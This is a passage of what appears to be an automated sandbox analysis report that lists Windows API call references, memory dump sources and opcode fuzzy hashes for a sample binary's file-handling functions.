                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1828521557-0
                                                                                                                                                                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2136311172-0
                                                                                                                                                                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E